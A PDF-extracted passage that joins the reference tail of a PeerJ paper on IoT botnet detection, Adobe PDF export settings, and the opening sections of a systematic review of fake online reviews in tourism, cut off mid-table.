IoT-connected world. Information and Management Journal 49(6):36–39. Vishwakarma R. 2019. A honeypot with machine learning based detection framework for defending IoT based Botnet DDoS attacks. In: 3rd International Conference on Trends in Electronics and Informatics, 23rd to 25th April 2019, Tirunelveli, Tamil Nadu, India. 1019–1024. Wang W, Shang Y, He Y, Li Y, Liu J. 2020. BotMark: automated botnet detection with hybrid analysis of flow-based and graph-based traffic behaviors. Information Sciences 511:284–296 DOI 10.1016/j.ins.2019.09.024. Zhang W, Zhang B, Zhou Y, He H, Ding Z. 2019. An IoT honeynet based on multi-port honeypots for capturing IoT attacks. IEEE Internet of Things Journal 7(5):3991–3999. Zheng Y, Keong C. 2011. A feature subset selection method based on high-dimensional mutual information. Entropy 13(4):860–901 DOI 10.3390/e13040860. Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 23/23 http://dx.doi.org/10.1109/TIT.2017.2688348 http://dx.doi.org/10.1016/j.jksuci.2020.06.012 http://dx.doi.org/10.1016/j.future.2019.05.041 http://dx.doi.org/10.1109/JIOT.2018.2797187 http://dx.doi.org/10.1109/ACCESS.2019.2958873 http://dx.doi.org/10.1016/j.procs.2018.05.137 http://dx.doi.org/10.1177/0954405417736547 http://dx.doi.org/10.1007/s10845-018-1433-8 http://dx.doi.org/10.1007/s12652-018-0998-6 http://dx.doi.org/10.1007/s12652-018-0998-6 http://dx.doi.org/10.1016/j.ins.2019.09.024 http://dx.doi.org/10.3390/e13040860 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Classification of botnet attacks in IoT smart factory using honeypot combined with machine learning Introduction Materials and Methods Results Discussion Conclusions flink6 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_dphsjhb7knae5pimptyktv4r2i ---- Submitted 15 April 2019 Accepted 19 August 2019 Published 23 September 2019 Corresponding author Jose Ramon Saura, joseramon.saura@urjc.es Academic editor Susan Herring Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.219 Copyright 2019 Reyes-Menendez et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS The importance of behavioral data to identify online fake reviews for tourism businesses: a systematic review Ana Reyes-Menendez1, Jose Ramon Saura1 and Ferrão Filipe2 1 Department of Business Economics, Rey Juan Carlos University, Madrid, Spain 2 Vice-Rector Universidade Portucalense, Universidade Portucalense Infante D. Henrique, Porto, Portugal ABSTRACT In the last several decades, electronic word of mouth (eWOM) has been widely used by consumers on different digital platforms to gather feedback about products and services from previous customer behavior. However, this useful information is getting blurred by fake reviews—i.e., reviews that were created artificially and are thus not representative of real customer opinions. The present study aims to thoroughly investigate the phenomenon of fake online reviews in the tourism sector on social networking and online reviews sites. To this end, we conducted a systematic review of the literature on fake reviews for tourism businesses. Our focus was on previous studies that addressed the following two main topics: (i) tourism (ii) fake reviews. Scientific databases were used to collect relevant literature. The search terms ‘‘tourism’’ and ‘‘fake reviews’’ were applied. The database of Web of Science produced a total of 124 articles and, after the application of different filters following the PRISMA 2009 Flow diagram, the process resulted in the selection of 17 studies. Our results demonstrate that (i) the analysis of fake reviews is interdisciplinary, ranging from Computer Science to Business and Management, (ii) the methods are based on algorithms and sentiment analysis, while other methodologies are rarely used; and (iii) the current and future state of fraudulent detection is based on emotional approaches, semantic analysis and new technologies such as Blockchain. This study also provides helpful strategies to counteract the ubiquity of fake reviews for tourism businesses. Subjects Human–Computer Interaction, Computer Networks and Communications, Network Science and Online Social Networks Keywords Online reviews, Fake reviews, Consumer behavior, Algorithms, Tourism INTRODUCTION In the last four decades, the continuously growing sector of tourism has been supported by the development of information and communication technologies (ICT) (Papathanassis & Buhalis, 2007; Buhalis & Law, 2008). In the 21st century, the digital revolution in social sciences and tourism should be taken into account, as it is one of the important factors that make the tourism industry competitive (Moutinho, Ballantyne & Rate, 2011; Saura & Bennett, 2019). Nowadays, consumers use different social platforms, such as social networking sites (SNS), consumer review sites, blogs, and social communities in order to communicate How to cite this article Reyes-Menendez A, Saura JR, Filipe F. 2019. The importance of behavioral data to identify online fake reviews for tourism businesses: a systematic review. PeerJ Comput. Sci. 5:e219 http://doi.org/10.7717/peerj-cs.219 mailto:joseramon.saura@urjc.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.219 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.219 and share their purchase experiences and behavior regarding for products and brands with other consumers (Cheung & Thadani, 2012; Chew, Metheney & Teague, 2017; Hubert et al., 2017). The continuously developing technologies and the wide spread use of the Internet in several industries have empowered the evolution from traditional word-of-mouth to electronic word-of-mouth (eWOM) (Gottschalk & Mafael, 2017; Manes & Tchetchik, 2018). eWOM is embodied in online reviews that customers write for other customers. The content of online reviews depends on the experience that these specific customers have with purchased products or services (Munar & Jacobsen, 2014; Saura, Reyes-Menendez & Alvarez-Alonso, 2018a). This fact has an important consequence for businesses, as there is a power shift from companies to consumers (Hennig-Thurau, Walsh & Walsh, 2003; Reyes-Menendez et al., 2018). The abovementioned power shift is particularly important in certain industries, such as the tourism industry where customers pay close attention to the opinion of previous travelers (Papathanassis & Knolle, 2011). For that reason, online reviews are a powerful communication tool for tourism businesses. Tourism businesses are companies such as hotels, ancillary services, transportation companies and restaurants (Riegner, 2007; Reyes-Menendez, Saura & Palos-Sánchez, 2018b). With the growth of the Internet, the number of online reviews has increased as well, exerting a significant influence on customers’ purchase decision making (Bennett, Yábar & Saura, 2017). The growing relevance of this type of communication is particularly important on social platforms where it takes the form of online reviews. However, what happens when this information does not represent the objective reality? Are companies, rather than real consumers, writing these reviews? In 2019, the Federal Trade Commission (FTC) denounced, for the first time, a company that advertised products to lose weight on Amazon for writing false reviews on this platform. In a press interview, the director of FTC, Andrew Smith, said that false reviews adversely affect both consumers and companies, as they represent a breach of market norms. For their part, Amazon representatives declared that they would take legal action against those fake reviews and invest significant economic and human resources to ensure that the reviews of the products presented on their platform are true and up-to-date (Shu, 2019). Overall, consumers are becoming increasingly aware that many of the reviews on social network sites are fraudulent. To show this trend in numbers, following Önder & Ulrich Gunter (2016) we first made a search with Google Trends, a tool used previously (Önder, Irem & Ulrich Gunter, 2016) to identify past search trends in Google on various topics of interest. The results are shown in Figs. 1 and 2. In Fig. 1, the searches on ‘‘fake reviews’’ made by users on Google are shown with a solid line, while searches on ‘‘fake news’’ are shown with a dotted line. As can be seen in Fig. 1, the number of searches on both topics has increased from 2004 to 2018. However, the increase is dramatically more pronounced for the searches related to ‘‘fake news’’. The dynamics of the growth in the number of searches on ‘‘fake reviews’’ only is shown in Fig. 2. As can be seen in Fig. 2, the number of searches on ‘‘fake reviews’’ has steadily increased throughout the period 2004–2018, and this number continues to grow. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Figure 1 Evolution of searches about fake news and fake reviews. Source: Google Trends (2018). Full-size DOI: 10.7717/peerjcs.219/fig-1 Figure 2 Evolution of searches about fake reviews. Source: Google Trends (2018). Full-size DOI: 10.7717/peerjcs.219/fig-2 In the next step, we checked the importance of the topic of fake reviews for the scientific community. This was done with a search in Web of Science (WOS), a scientific database that indexes scientific articles. Similarly to the results obtained with Google Trends, the WOS findings suggest that, throughout 2004–2018, there has been a considerable growth in the number of articles published on the issues of fake news and fake online reviews. Furthermore, again consistent with the results of using Google Trends, the scientific community has been more interested in the topic of fake news, as we found 248 papers that include the term ‘‘fake news’’ in the title, while there were only 48 papers with the term ‘‘fake reviews’’ in the title. Figure 3 shows the dynamics in the number of citations to articles addressing fake online reviews throughout the period 2004–2018. As can be seen in Fig. 3, the first citations appeared in 2013. However, it was not until 2014 that scientific interest in fake online reviews skyrocketed, and it continues to grow today. Of note, according to the publication terms of the journals included in the JCR (Journal Citation Report) Index to which Web of Science (WOS) belongs, the publications that appeared in 2018 will begin to get cited in the next months or years. This explains why the publications from 2018 do not follow the growth trend as compared to the previous years. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 3/21 https://peerj.com https://doi.org/10.7717/peerjcs.219/fig-1 https://doi.org/10.7717/peerjcs.219/fig-2 http://dx.doi.org/10.7717/peerj-cs.219 Figure 3 Number of citations to articles by year. Source: Google Trends (2018). Full-size DOI: 10.7717/peerjcs.219/fig-3 The results shown in Figs. 1–3 underscore the importance of the topic of fake online reviews for consumers, companies, and the scientific community. Accordingly, in the present paper, our major goal is to identify directions of current research to address the problem of fake reviews on tourism platforms. The remainder of this paper is structured as follows. After a brief literature review in ‘Literature Review’, we present the methodology used in the present study in ‘Methodology’. Results are reported in ‘Exploratory analysis of results’. The paper concludes with a discussion of implications of our findings (‘Implications’) and general conclusions (‘Conclusions’). LITERATURE REVIEW Over the last years, many studies have investigated the impact of online reviews on consumer purchase behavior and decision making (Chevalier & Mayzlin, 2003; Riegner, 2007; Gretzel & Yoo, 2008). A strong influence of online reviews has also been highlighted in numerous industrial statistic reports (e.g., Reyes-Menendez et al., 2018). Electronic word-of-mouth has become an important concept for tourism businesses (Papathanassis & Knolle, 2011). According to Litvin, Goldsmith & Pan (2008) and Pai et al. (2013), eWOM is the most important source of information that drives consumer purchase behavior in the hospitality and tourism services sectors. In the last several decades, advances in information and communication technologies (ICTs) have transformed both travelers’ behavior and the tourism industry (Buhalis & Law, 2008). Nowadays, Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 4/21 https://peerj.com https://doi.org/10.7717/peerjcs.219/fig-3 http://dx.doi.org/10.7717/peerj-cs.219 the number of travelers who access the Internet to book hotel rooms via third-party intermediaries is continuously increasing (Luo, Chen & Zheng, 2016). Furthermore, several studies demonstrated that about two-thirds of customers prefer to read online consumer reviews about a hotel, rather rely on the hotel’s own descriptions. Such online reviews are visited by hundreds of millions of potential hotel visitors every year (Reyes-Menendez, Saura & Martinez-Navalon, 2019) Therefore, in order to obtain a better understanding of the continuously increasing impact of eWOM on different social platforms and its effect on the decision making and behavior of hotel consumers, reviews on online travel sites and social networking sites should be taken into account (Saura, Rodriguez Herráez & Reyes-Menendez, 2019). Yet, a recently emerging issue with online reviews is that some online reviews are fake. Although most online platforms have their own false review detection algorithms (Cheng, Tseng & Chung, 2017), these algorithms are sometimes limited in scope and filter only 16% of published fake reviews (Luca & Zervas, 2016). Therefore, there is a clear need to improve the existing algorithms and elaborate new approaches. Many studies have sought to do just that (e.g., Elmurngi & Gherbi, 2017; Munzel, 2016; Zhang et al., 2016). To this end, various methodologies have been used, some of which will be discussed in the remainder of this paper. METHODOLOGY Following Kazakov & Predvoditeleva (2015), in the present study, we aimed to provide an overview of previous research on the state of art of online fake reviews in tourism social networking sites. We focused on the analysis of users’ ability to detect real or fake reviews. To this end, we critically examined the available literature on tourism fake reviews and behavioral approaches to analyze and identify them for tourism businesses. The systematic literature review focused on the following two main topics: (i) fake reviews; (ii) tourism. Following Sherman et al. (2005) and Banerjee, Chua & Kim (2015), we used a randomized controlled process to select the main topics and consequent search terms ‘‘fake reviews’’ and ‘‘tourism’’. The scientific databases of Scopus, PubMed, PsyINFO, ScienceDirect, and Web of Science were used to collect relevant studies on the issue at stake. Of note, when performing the search by ‘‘Title’’ in the scientific database Web of Science, only one article met the aforementioned search requirement, that both ‘‘fake reviews AND tourism’’ were contained in the title. Therefore, following Saura, Palos-Sánchez & Suárez (2017), we included the articles that were initially obtained as a result of the search, prioritizing those that dealt with reviews, even if they were not specifically focused on tourism platforms. We reasoned that the insights reported in these studies could be extended to address the problem of false reviews on tourism platforms. The search yielded a total of 124 articles; after different filters were applied (see Fig. 4), a total of 17 studies were selected for further analysis. The Boolean operator AND was applied to optimize the results. All articles were analyzed by reading the titles and abstracts and selecting the ones which met the inclusion criteria. Next, we analyzed the 17 selected papers. The data were collected in June 2018 using AMSTAR (2017), a tool Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 5/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Figure 4 PRISMA 2009 Flow Diagram. Full-size DOI: 10.7717/peerjcs.219/fig-4 initially designed to assess the quality of articles based on their abstracts (Shea et al., 2009). In this way, we ensured that only high-quality studies were included in the dataset. In the process of article selection, we also followed the recommendations formulated by Van den Bosch & Ode Sang (2017). These recommendations include keyword search in several databases, predefined inclusion criteria, and data extraction based on selected keywords. To this end, following Saura, Palos-Sánchez & Suárez (2017), we used the Preferred Reporting Items for Systematic reviews and Meta-Analyses (PRISMA) 2009 Flow Diagram. This method, introduced by Moher et al. (2009), provides guidelines to develop Systematic Reviews and Meta-Analyses that include conceptual and practical advances in the science of systematic reviews. One of the phases of the PRISMA Flow Diagram is discarding the articles that have inadequate or inconclusive terms. The terms considered as inadequate or inconclusive are those that a priori may correspond to the keywords; however, when reading the article in depth, it is observed that they are not within the scope of the investigation. These terms can be misleading, as in the case of reviews that may be either tourist reviews or peer reviews. Our aim was to achieve the highest possible amount of evidence in the results based on high-quality studies. Some of the variables used in AMSTAR to evaluate the quality of the systematic review were (i) the relationship of the research question to the criteria included in the study; (ii) the extraction of data from at least two independent researchers; (iii) the quality of the literature review, (iii) identification and definition of concepts; and (iv) the quality of the conclusions stated in the study. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 6/21 https://peerj.com https://doi.org/10.7717/peerjcs.219/fig-4 http://dx.doi.org/10.7717/peerj-cs.219 EXPLORATORY ANALYSIS OF RESULTS The Systematic Literature Review (RSL) was proposed by Saura, Palos-Sánchez & Suárez (2017) and Bassett (2015) as a development tool to carry out an exploratory analysis of previously reported results. Such a literature review is used to evaluate researchers’ interest in a specific topic (Saura, Reyes-Menendez & Palos-Sanchez, 2018b). A literature review is an exploratory methodology and consists of collecting and re-analyzing available findings. A literature review usually includes both primary and secondary sources. Luo & Zhong (2015) and Comerio & Strozzi (2018) conducted literature reviews and applied exploratory analysis specifically for tourism businesses, while Huete-Alcocer (2017) focused on the transformation of the traditional word-of-mouth into electronic word-of- mouth, and the behavioral implications of this transition for the tourism industry. A summary of the studies selected for further analysis in the present review is shown in Table 1. Table 1 presents the authors of relevant studies, as well as the main contents of those studies. Based on this information, we categorized the reviewed studies in several groups. For instance, the studies that can be applied to all sectors were categorized as ‘‘All Industries’’. A study classified into the category of ‘‘E-Commerce’’ was included in the analysis since, for example, TripAdvisor is considered an E-commerce platform in the tourism sector. Studies on restaurants were categorized into the ‘‘Restaurant—Hospitality Industry’’ group. Finally, articles on hotels and other tourist services were grouped into the ‘‘Tourism’’ category. The studies summarized in Table 1 demonstrate the growing interest in the concept of fake reviews and social networking sites, particularly in the hospitality and tourism industries. Some of these studies (e.g., Banerjee & Chua, 2014; Banerjee et al., 2015; Cardoso, Silva & Almeida, 2018; Chang et al., 2015; Deng & Chen, 2014; Hunt, 2015; Lappas, Sabnis & Valkanas, 2016a; Lappas, Sabnis & Valkanas, 2016b; Li, Feng & Zhang, 2016; Munzel, 2016) focus on the Tourism industry category, while others fall into the hospitality industry category (Chen, Guo & Deng, 2014; Li et al., 2014; Li et al., 2018; Luca & Zervas, 2016). Some works (Lin et al., 2014; Zhang et al., 2016; Ramalingam & Chinnaiah, 2018) were included as part of the analysis because their results can be implemented in every industry that allows consumers to write reviews, including the tourism industry. Elmurngi & Gherbi (2018) analyzed false reviews in E-commerce, considering that TripAdvisor is the most important e-commerce platform in the hospitality industry; therefore, this study might be of interest to the present study (Reyes-Menendez, Saura & Alvarez-Alonso, 2018a). The interest in the concept of fake reviews is underpinned by two factors. First, as demonstrated in several studies, the currently available algorithms of false review detection remain largely ineffective. For instance, Luca & Zervas’ (2016) results demonstrate that only 16% of the false reviews are filtered on the Yelp platform—particularly, those that have more extreme content, either positive or negative; this suggests that the remaining 84% of reviews are not filtered and may be false. Second, as demonstrated in several studies, false reviews negatively impact companies’ visibility. For instance, Lappas, Sabnis & Valkanas (2016a) and Lappas, Sabnis & Valkanas (2016b) report that, with only 50 false reviews in some markets, competitors can be overtaken in terms of visibility. In this sense, Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 7/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Table 1 Previous studies on fake online reviews in the tourism industry. Authors Study description Study industry Banerjee & Chua (2014) This study proposes several algorithms of identification of false reviews. Attention is paid to linguistic 